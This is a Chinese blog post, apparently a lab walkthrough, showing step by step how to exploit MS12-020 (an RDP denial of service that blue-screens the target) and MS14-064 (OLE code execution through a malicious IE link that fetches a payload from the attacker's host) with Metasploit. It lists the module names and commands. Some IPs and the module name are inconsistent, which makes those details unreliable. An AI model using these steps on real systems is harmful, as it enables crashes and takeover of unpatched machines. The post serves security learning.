漏洞复现
一、MS12-020(蓝屏攻击)漏洞
1.原理
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)
根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
微软的安全公告:Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。
2.实验环境
攻击机:kali IP:192.168.92.128
靶机win2003 IP:192.168.92.148
两者都在同一内网,采用NAT连接方式
3.漏洞复现
1、开启win2003的远程桌面:控制面板–>系统–>远程–>远程协助–>远程桌面
2、控制面板–>windows防火墙–>例外–>远程桌面
3、用nmap扫描靶机,发现靶机的3389端口已经打开
输入:nmap 192.168.92.148
4、在kali的终端中打开msfconsole
5、使用search功能搜索ms12-020,发现有两个可用模块。
输入:search ms12-020
6、使用第一个可用版模块
输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
或者use 0
7、利用set命令设置攻击的IP。
输入:set rhosts 192.168.252.160
show options
8、输入:exploit,执行攻击
9、看一下靶机,发现靶机蓝屏了
二、MS14-064(OLE远程代码执行)漏洞
1.原理
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。
2.实验环境
攻击机:kali ip:192.168.92.128
靶机:win2003 ip:192.168.92.148
工具kali MSF
3.漏洞复现
1、打开kali 进入MSF框架
2、找到MS14-064漏洞
search ms14-064
use 0
3、查看当前模块参数
show options
4、设置参数
set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip
5、查看和设置可攻击目标
show targets
set targets 1
6、执行获得恶意链接
run
exploit
http://192.168.92.128:8080/48RjcxdmmZe41H
标签:064,漏洞,--,192.168,MS12,远程桌面,靶机,020 From: https://blog.csdn.net/qq_72421395/article/details/140918585